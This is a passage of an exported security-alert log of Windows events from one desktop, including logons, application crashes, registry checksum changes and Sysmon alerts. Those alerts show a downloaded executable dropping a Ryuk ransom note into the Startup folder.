{df9fc3d3-6de1-5e8c-0000-00104fa30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #0 +Details: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""" +"Apr 26, 2020 @ 10:15:03.519",3,"Windows User Logoff",,"""User initiated logoff: + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x350B0 + +This event is generated when a logoff is initiated. No further user-initiated activity can occur. This event can be interpreted as a logoff event.""" +"Apr 26, 2020 @ 10:15:02.598",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:15:02.584",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:15:01.520",5,"Windows System error event",,"""The server {3EB3C877-1F16-487C-9050-104DBCD66683} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:01.504",5,"Windows System error event",,"""The server {3EB3C877-1F16-487C-9050-104DBCD66683} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:01.490",5,"Windows System error event",,"""The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:01.474",5,"Windows System error event",,"""The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:01.457",10,"Multiple System error events",,"""The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:01.039",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '77452a225ee13df710790a5b4f328a2c' +New md5sum is : 'd64ecd3813037bada0bfee569056567f' +Old sha1sum was: '35ff32bd38b77e38d2689d9661696e1637758085' +New sha1sum is : '5e4e3349a0a93949f867c623c0c0cda1be5c09c0' +", +"Apr 26, 2020 @ 10:15:00.504",5,"Windows System error event",,"""The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:00.490",5,"Windows System error event",,"""The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:00.473",5,"Windows System error event",,"""The server Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy!Windows.Security.Authentication.Web.Core.BackgroundGetTokenTask.ClassId.WebAccountProvider did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:00.457",5,"Windows System error event",,"""The server Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy!Windows.Security.Authentication.Web.Core.BackgroundGetTokenTask.ClassId.WebAccountProvider did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:00.441",5,"Windows System error event",,"""The server Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy!Windows.Security.Authentication.Web.Core.BackgroundGetTokenTask.ClassId.WebAccountProvider did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:14:59.371",5,"Windows System error event",,"""The server Microsoft.OneConnect_5.2002.431.0_x64__8wekyb3d8bbwe!App.AppXe8pdgw5syxe8pgccbk3mcn5hanwamr0e.mca did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:14:59.333",5,"Windows System error event",,"""The server Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub.AppXt4mh7c9swwc5cmd5jgmtmwcfmvkddpn1.mca did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:14:49.119",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:12:24.478",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '754f1ee7e3cc78fe16476bedca194ad8' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '71353faa3213206f750e881a2b1d4519bdb7044b' +", +"Apr 26, 2020 @ 10:12:24.470",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '754f1ee7e3cc78fe16476bedca194ad8' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '71353faa3213206f750e881a2b1d4519bdb7044b' +", +"Apr 26, 2020 @ 10:12:10.896",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : '06ee04d9da091e86d711d66806729f5c' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : '7707469f1df348faab167e60c47e12aed52a2835' +", +"Apr 26, 2020 @ 10:12:10.888",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : '69f9f86f89c4f1044f697b8ca9951f90' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'ff1c71f7d5380708f2299827b7f088e4f472cde2' +", +"Apr 26, 2020 @ 10:11:37.335",4,"Summary event of the report's signatures",,"""Fault bucket 1748590087670006804, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: ApplicationFrameHost.exe +P2: 10.0.18362.1 +P3: bd2da9a6 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D2D.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FAE.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FEE.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3016.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3065.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ApplicationFrame_95f59f48c671a84fbb96e96ffdc18a7bcf3d12a_3264d41a_4f415d0b-4356-4882-a2c6-8cf4516c9906 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: f41bab22-e73b-46f3-927e-95d051758fb5 +Report Status: 268435456 +Hashed bucket: a1c4031c1238e6dca8443d6b99570414 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:11:37.299",4,"Summary event of the report's signatures",,"""Fault bucket 1162358189688482716, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: ApplicationFrameHost.exe +P2: 10.0.18362.1 +P3: BD2DA9A6 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH2C74.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C75.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C95.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CF7.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E11.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: f857b43f-df19-42db-9569-4ff9fa8c1634 +Report Status: 268435456 +Hashed bucket: 3f2d25722684bffdd021869d7625eb9c +Cab Guid: 0""" +"Apr 26, 2020 @ 10:11:33.823",9,"Windows Application error event",,"""Faulting application name: ApplicationFrameHost.exe, version: 10.0.18362.1, time stamp: 0xbd2da9a6 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1280 +Faulting application start time: 0x01d60cd5d1e97351 +Faulting application path: C:\Windows\system32\ApplicationFrameHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: f41bab22-e73b-46f3-927e-95d051758fb5 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:11:28.147",4,"Summary event of the report's signatures",,"""Fault bucket 1791194967134900880, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +P2: praid:runtimebroker07f4358a809ac99a64a67c1 +P3: 10.0.18362.1 +P4: 4539d5a0 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE1C.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF1.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER107F.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER10B3.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1140.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_29686b7a1ac2a6a9b4db3f085a7951eb9cdb46_447869e0_0b9491d1-db03-4734-8e7c-3c73164d86a4 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 35e0382b-a496-47ea-9fb5-e4a8ca651f2d +Report Status: 268435456 +Hashed bucket: 70f67c91489ca0da48db9a551b8b1290 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:11:26.402",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:11:25.833",10,"Multiple Windows error Application events",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x11f4 +Faulting application start time: 0x01d60cd5ab9bde4c +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 35e0382b-a496-47ea-9fb5-e4a8ca651f2d +Faulting package full name: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""" +"Apr 26, 2020 @ 10:11:20.190",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" +"Apr 26, 2020 @ 10:10:57.991",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '775174ea9bf25c40ba381ca284d7511d' +New md5sum is : '6a4fdf3a9f7dc36fc03599f720d484d3' +Old sha1sum was: 'eab80f5279cedff3dd227a62f8828aa899a27475' +New sha1sum is : '9f469b80d1166a11ab0299760c6cb444ef555670' +", +"Apr 26, 2020 @ 10:10:56.591",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c0c6695dce196a871da947899f40ca49' +New md5sum is : '77452a225ee13df710790a5b4f328a2c' +Old sha1sum was: 'c4e493209d7f483afd2384f0cd03f0f4ce89534c' +New sha1sum is : '35ff32bd38b77e38d2689d9661696e1637758085' +", +"Apr 26, 2020 @ 10:10:56.547",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '9b2eb62ca4c74330ffa1448b22e6dfac' +New md5sum is : '4ba4365f07f1541a9d0cb4adc696cbaa' +Old sha1sum was: '9ae0bb56b661cb86cac596f8cf95cde5c871458b' +New sha1sum is : '6766757ccbe9ec12bc588faf319b992e7bd63e19' +", +"Apr 26, 2020 @ 10:10:53.592",12,"ATT&CK T1060: Potential Persistence Method via Startup Folder","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""11"",""version"":""2"",""level"":""4"",""task"":""11"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:16:58.997607900Z"",""eventRecordID"":""587"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""File created:\r\nRuleName: T1023\r\nUtcTime: 2020-04-07 12:16:58.991\r\nProcessGuid: {df9fc3d3-6de5-5e8c-0000-00109afc0100}\r\nProcessId: 1144\r\nImage: C:\\Program Files (x86)\\ossec-agent\\ossec-agent.exe\r\nTargetFilename: C:\\Program Files (x86)\\ossec-agent\\queue\\diff\\local\\users\\john williams\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\ryukreadme.html\\last-entry.gz\r\nCreationUtcTime: 2020-04-07 12:16:58.991\""""},""eventdata"":{""ruleName"":""T1023"",""utcTime"":""2020-04-07 12:16:58.991"",""processGuid"":""{df9fc3d3-6de5-5e8c-0000-00109afc0100}"",""processId"":""1144"",""image"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\ossec-agent.exe"",""targetFilename"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\queue\\\\diff\\\\local\\\\users\\\\john williams\\\\appdata\\\\roaming\\\\microsoft\\\\windows\\\\start menu\\\\programs\\\\startup\\\\ryukreadme.html\\\\last-entry.gz"",""creationUtcTime"":""2020-04-07 12:16:58.991""}}}","""File created: +RuleName: T1023 +UtcTime: 2020-04-07 12:16:58.991 +ProcessGuid: {df9fc3d3-6de5-5e8c-0000-00109afc0100} +ProcessId: 1144 +Image: C:\Program Files (x86)\ossec-agent\ossec-agent.exe +TargetFilename: C:\Program Files (x86)\ossec-agent\queue\diff\local\users\john williams\appdata\roaming\microsoft\windows\start menu\programs\startup\ryukreadme.html\last-entry.gz +CreationUtcTime: 2020-04-07 12:16:58.991""" +"Apr 26, 2020 @ 10:10:53.517",12,"ATT&CK T1060: Potential Persistence Method via Startup Folder","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""11"",""version"":""2"",""level"":""4"",""task"":""11"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:16:58.993466700Z"",""eventRecordID"":""586"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""File created:\r\nRuleName: T1023\r\nUtcTime: 2020-04-07 12:16:58.975\r\nProcessGuid: {df9fc3d3-6de5-5e8c-0000-00109afc0100}\r\nProcessId: 1144\r\nImage: C:\\Program Files (x86)\\ossec-agent\\ossec-agent.exe\r\nTargetFilename: C:\\Program Files (x86)\\ossec-agent\\queue\\diff\\local\\users\\john williams\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\ryukreadme.html\r\nCreationUtcTime: 2020-04-07 12:16:58.975\""""},""eventdata"":{""ruleName"":""T1023"",""utcTime"":""2020-04-07 12:16:58.975"",""processGuid"":""{df9fc3d3-6de5-5e8c-0000-00109afc0100}"",""processId"":""1144"",""image"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\ossec-agent.exe"",""targetFilename"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\queue\\\\diff\\\\local\\\\users\\\\john williams\\\\appdata\\\\roaming\\\\microsoft\\\\windows\\\\start menu\\\\programs\\\\startup\\\\ryukreadme.html"",""creationUtcTime"":""2020-04-07 12:16:58.975""}}}","""File created: +RuleName: T1023 +UtcTime: 2020-04-07 12:16:58.975 +ProcessGuid: {df9fc3d3-6de5-5e8c-0000-00109afc0100} +ProcessId: 1144 +Image: C:\Program Files (x86)\ossec-agent\ossec-agent.exe +TargetFilename: C:\Program Files (x86)\ossec-agent\queue\diff\local\users\john williams\appdata\roaming\microsoft\windows\start menu\programs\startup\ryukreadme.html +CreationUtcTime: 2020-04-07 12:16:58.975""" +"Apr 26, 2020 @ 10:10:53.477",12,"ATT&CK T1060: Potential Persistence Method via Startup Folder","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""11"",""version"":""2"",""level"":""4"",""task"":""11"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:16:58.990300100Z"",""eventRecordID"":""585"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""File created:\r\nRuleName: T1023\r\nUtcTime: 2020-04-07 12:16:58.975\r\nProcessGuid: {df9fc3d3-6de5-5e8c-0000-00109afc0100}\r\nProcessId: 1144\r\nImage: C:\\Program Files (x86)\\ossec-agent\\ossec-agent.exe\r\nTargetFilename: C:\\Program Files (x86)\\ossec-agent\\queue\\diff\\local\\users\\john williams\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\r\nCreationUtcTime: 2020-04-07 12:16:58.975\""""},""eventdata"":{""ruleName"":""T1023"",""utcTime"":""2020-04-07 12:16:58.975"",""processGuid"":""{df9fc3d3-6de5-5e8c-0000-00109afc0100}"",""processId"":""1144"",""image"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\ossec-agent.exe"",""targetFilename"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\queue\\\\diff\\\\local\\\\users\\\\john williams\\\\appdata\\\\roaming\\\\microsoft\\\\windows\\\\start menu\\\\programs\\\\startup"",""creationUtcTime"":""2020-04-07 12:16:58.975""}}}","""File created: +RuleName: T1023 +UtcTime: 2020-04-07 12:16:58.975 +ProcessGuid: {df9fc3d3-6de5-5e8c-0000-00109afc0100} +ProcessId: 1144 +Image: C:\Program Files (x86)\ossec-agent\ossec-agent.exe +TargetFilename: C:\Program Files (x86)\ossec-agent\queue\diff\local\users\john williams\appdata\roaming\microsoft\windows\start menu\programs\startup +CreationUtcTime: 2020-04-07 12:16:58.975""" +"Apr 26, 2020 @ 10:10:50.264",5,"File added to the system.","File 'c:\users\john williams\appdata\roaming\microsoft\windows\start menu\programs\startup\ryukreadme.html' was added. +(Audit) User: 'John Williams (S-1-5-21-438079597-2123118846-2669748851-1001)' +(Audit) Process id: '5876' +(Audit) Process name: 'C:\Users\John Williams\Downloads\progam18.exe' +", +"Apr 26, 2020 @ 10:10:50.170",12,"ATT&CK T1060: Potential Persistence Method via Startup Folder","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""11"",""version"":""2"",""level"":""4"",""task"":""11"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:16:57.597729300Z"",""eventRecordID"":""578"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""File created:\r\nRuleName: T1023\r\nUtcTime: 2020-04-07 12:16:57.585\r\nProcessGuid: {df9fc3d3-6ed8-5e8c-0000-001077171500}\r\nProcessId: 5876\r\nImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nTargetFilename: C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\RyukReadMe.html\r\nCreationUtcTime: 2020-04-07 12:16:57.585\""""},""eventdata"":{""ruleName"":""T1023"",""utcTime"":""2020-04-07 12:16:57.585"",""processGuid"":""{df9fc3d3-6ed8-5e8c-0000-001077171500}"",""processId"":""5876"",""image"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""targetFilename"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\RyukReadMe.html"",""creationUtcTime"":""2020-04-07 12:16:57.585""}}}","""File created: +RuleName: T1023 +UtcTime: 2020-04-07 12:16:57.585 +ProcessGuid: {df9fc3d3-6ed8-5e8c-0000-001077171500} +ProcessId: 5876 +Image: C:\Users\John Williams\Downloads\progam18.exe +TargetFilename: C:\Users\John Williams\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html +CreationUtcTime: 2020-04-07 12:16:57.585""" +"Apr 26, 2020 @ 10:10:46.938",4,"Summary event of the report's signatures",,"""Fault bucket 1657758300517278340, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: smartscreen.exe +P2: 10.0.18362.1 +P3: cd4269a6 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B66.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER63C3.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER64FD.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER65BB.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER68C9.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_smartscreen.exe_a7811b8033dd303c40b87ed1ad6c29cf39727bee_5d80af6c_337ef676-c6e8-4576-9f20-140739890c71 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 4254d034-ffd9-4e60-8a44-cb2496b08583 +Report Status: 268435456 +Hashed bucket: 0424f099e54e519237018a6421c9a284 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:42.281",4,"Summary event of the report's signatures",,"""Fault bucket 1296249511987065443, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: smartscreen.exe +P2: 10.0.18362.1 +P3: CD4269A6 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH5896.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER58A7.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5906.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER59A3.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C92.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: f6228eb9-e4a1-4f79-b456-c520dc4a127f +Report Status: 268435456 +Hashed bucket: d71934d1179b2fac11fd341036433263 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:40.646",5,"Clipboard User Service_3d061 terminated unexpectedly",,"""The Clipboard User Service_3d061 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 3000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:10:39.575",9,"Windows Application error event",,"""Faulting application name: smartscreen.exe, version: 10.0.18362.1, time stamp: 0xcd4269a6 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x156c +Faulting application start time: 0x01d60cd5b3870755 +Faulting application path: C:\Windows\System32\smartscreen.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 4254d034-ffd9-4e60-8a44-cb2496b08583 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:10:39.059",4,"Summary event of the report's signatures",,"""Fault bucket 1421593295057521696, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: svchost.exe +P2: 10.0.18362.1 +P3: 32d6c210 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A8D.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D8C.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DBC.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DE9.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4ED5.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_svchost.exe_a4555823d184431378d589e9aa5705236516327_a3c514cf_0259995c-8623-44e9-a077-3d23fd76cc7b + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 20dee9e0-3b9a-4ba3-a845-f7cf0e4b830b +Report Status: 268435456 +Hashed bucket: 1b46097b621a046973ba8391e6fb0c20 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:38.006",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1634031 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.137.137.111:123) is working properly.""" +"Apr 26, 2020 @ 10:10:35.500",9,"Windows Application error event",,"""Faulting application name: 